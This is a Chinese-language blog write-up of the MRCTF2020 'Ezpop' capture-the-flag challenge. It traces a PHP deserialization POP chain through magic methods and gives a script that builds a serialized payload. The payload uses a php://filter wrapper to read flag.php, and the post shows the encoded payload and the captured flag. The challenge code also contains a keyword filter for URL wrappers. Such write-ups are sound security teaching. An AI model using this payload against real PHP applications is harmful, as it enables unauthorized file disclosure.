[MRCTF2020]Ezpop

最新推荐文章于 2024-06-13 14:21:23 发布
最新推荐文章于 2024-06-13 14:21:23 发布
阅读量449 收藏 9
点赞数 5
分类专栏: 信息安全 Web安全 Buuctf 文章标签: android web安全 网络安全 php 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/138999534
版权
信息安全 同时被 3 个专栏收录
78 篇文章 10 订阅
订阅专栏
Web安全
50 篇文章 4 订阅
订阅专栏
Buuctf
17 篇文章 1 订阅
订阅专栏

[MRCTF2020]Ezpop

1.开局就是代码审计

<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

在这里插入图片描述

2.一步一步进行反向推敲
3.明确目的,我们想利用include()函数进行文件包含的漏洞利用,然而include()又在append方法中,因此需要先触发append方法,但是无法直接调用append方法,只能通过__invoke()魔术方法进行触发。

class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

4.那什么时候会触发__invoke()魔术方法呢?当对象被当做函数时,才会触发__invoke()函数,此时,我就卡在了反推的这一步,卡的死死的。

5,反向推测先暂缓一下,使用正向思维进行探测,通过GET的请求方式进行pop参数的传参,然后对pop字符串的内容进行反序列化处理。

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

6.当我们使用反序列化时,会触发__wakeup()方法,此时的变量source就会被当做字符串进行处理,此时就会触发__tostring()方法

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

7.当触发__tostring()方法后,当str不存在时,就会触发__get()方法,此时就会调用变量p,此时返回的是function()这个函数


class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

8.此时的变量p,此时我们传入Modifier的对象,就会被当做函数返回,从而触发__invoke()方法,此时就和卡着的第二步成功接轨。

class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

9.那么反向推理的思维总结如下

include()函数的调用<–append()方法的触发<–__invoke()方法的触发<–__get()方法的触发<–__tostring()方法的触发<–__wakeup()方法的触发<–反序列化

10.pop链的构造

<!--####通过pop参数,GET方式传入,然后进行反序列化,反序列化的话就会出发__wakeup()方法,这个时候$this->source就会被当做字符串进行执行-->
<!--####这个时候就会出发__tostring()方法,进行$this->str->source,这个时候str是不存在的变量,如果此时$str被当做不存在的对象执行时-->
<!--####就会出发__get()方法,就会返回$this->p,这个时候如果将对象p当做函数执行时,就会出发__invoke()方法,从而调用include()函数,-->
<!--触发文件包含漏洞。-->
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}


$a = new Modifier();
$b = new Show();
$c = new Test();
$c->p = $a;
$b->source = new Show();
$b->source->str = $c;
echo urlencode(serialize($b));

在这里插入图片描述

11.生成的pop

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A9%3A%22index.php%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

在这里插入图片描述

12.base64在线解密得到flag

在这里插入图片描述

flag{3d978fdf-0807-4de2-bbe0-95efad49042d}

在这里插入图片描述

山川绿水
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 377
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
vigenere-cipher:Vigenere密码
03-19
它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
MRCTF2020 Ezpop
Tajang的大千世界
07-10 499
打开靶机,哇,直接给源码 这道题的知识点是利用php魔术方法的相互关联,构造pop链,其实有的地方没太懂,群里Y1ng大佬还回复我了,好兴奋,这题他的wp也看过,接下来就按我的理解写 知道我对这道题理解多么蠢吗?简直蠢得不可理喻,我以为代码审计,读懂代码会和上次绕过一样的类型,后来证明我真的蠢,给大家看看我的代码审计 我是真得蠢。。。不说了,先来讲一波php魔术方法 __construct 当一个对象创建时被调用, __toString 当一个对象被当作一个字符串被调用。 __wakeup
BUUCTF [MRCTF2020]Ezpop 详解
lzu_lfl的博客
11-09 588
pop链
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2289
将pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
MRCTF2020 Ezpop wp
arcuied
11-27 489
MRCTF2020 Ezpop wp
[MRCTF2020]Ezpop_Revenge
qq_45691294的博客
10-17 1359
题目打开是个typecho博客,www.zip泄露,下载得到源码 看到flag.php可能是一个SSRF的题 <?php if(!isset($_SESSION)) session_start(); if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){ $_SESSION['flag']= "MRCTF{******}"; }else echo "我扌your problem?\nonly localhost can get flag!"; ?> 因为是一
[MRCTF2020]Ezpop 1
shinygod的博客
03-28 1347
知识点:各种魔术方法,以及构造反序列化pop链子的思路 <?php //flag is in flag.php class Modifier { protected $var="php://filter/resource=flag.php"; public function append($value){ include($value);//漏洞利用点 } public function __invoke(){ //在类被当作函数调用
buuctf-[MRCTF2020]Ezpop)(小宇特详解)
小宇的web博客
04-04 3005
buuctf-[MRCTF2020]Ezpop(小宇特详解) 1.先查看题目,题目是eazypop,说明这道题是让构造简单的pop链 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%9
BUUCTF [MRCTF2020]Ezpop
qq_52671379的博客
04-01 244
BUUCTF [MRCTF2020]Ezpop
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强...
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
1.mrctf[friendly_sign-in] 意思就是服务器产生一个数组$N$,需要输入一个数组$X$与其对应位置乘积和为$0$,题目说$N$中全为素数,实际好像不是,因为产生这么多素数比较耗时间,但里面还是大部分都是素数。这里可以...
【MySQL】服务器配置和管理
p_fly的博客
06-09 706
MySQL服务器通常说的是mysqld程序。mysqld 是 MySQL 数据库服务器的核心程序,负责处理客户端的请求、管理数据库和执行数据库操作。管理员可以通过配置文件和各种工具来管理和监控 mysqld 服务器的运行本文将介绍下面三个内容:服务器启动选项:可以在命令行和配置文件中指定,用于配置服务器的行为和特性。服务器系统变量:反映了启动选项的当前状态和值,其中一些变量可以在服务器运行时修改。服务器状态变量:包含了关于运行时操作的计数器和统计信息。
Android 11】AOSP Settings添加屏幕旋转按钮
xuanyulevel6的博客
06-13 237
这里是客户要求添加按钮以实现屏幕旋转。这里的值可以是0,1,2,3 的任意一个。我这里没有陀螺仪,所以只需要这个命令就够了。更多的可以参考但是这有个缺陷,就是开机的动画不能随着设置好的屏幕方向旋转。
Android WebSocket长连接的实现
Billy_Zuo的博客
06-12 1213
WebSocket 协议在2008年诞生,2011年成为国际标准。所有浏览器都已经支持了。它的最大特点就是,服务器可以主动向客户端推送信息,客户端也可以主动向服务器发送信息,是真正的双向平等对话,属于[“服务器推送技术”]的一种。WebSocket的特点包括:建立在 TCP 协议之上,服务器端的实现比较容易。与 HTTP 协议有着良好的兼容性。默认端口也是80和443,并且握手阶段采用 HTTP 协议,因此握手时不容易屏蔽,能通过各种 HTTP 代理服务器。支持双向通信,实时性更强。
Android AOSP定制去掉Google搜索栏
u012556114的博客
06-10 785
AOSP 概览Android 是适用于各种不同规格设备的操作系统。任何人都可以通过 Android 开源项目 (AOSP) 查看 Android 的文档和源代码。您可以使用 AOSP 为自己的设备创建自定义 Android OS 变体。AOSP 的设计可确保不存在一个集中瓶颈,即没有任何行业参与者可一手限制或控制其他参与者的创新。因此,AOSP 是一款功能完善且达到生产质量的开发者产品,其源代码可以开放自定义和移植。
android OTA升级之后,apk崩溃无法启动
最新发布
kevin's cache的专栏
06-13 331
也就是说,我们这个高低版本是fingerprint相同的情况,这个问题追述到jenkins编译,启动job时会初始化一个BUILD_NUMBER值,这个值正好跟Android的build系统的名称重复,这就导致Android build系统那一套拼接时间戳的值不会走,因为jenkins一启动就会定义该值,而我们jenkins服务器迁移过,这个值又会从1开始累计,导致前后版本都是16,从而导致fingerprint一致。问题背景:系统版本从低版本升级到高版本后,apk崩溃启动失败。硬件平台:QCS6125。
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值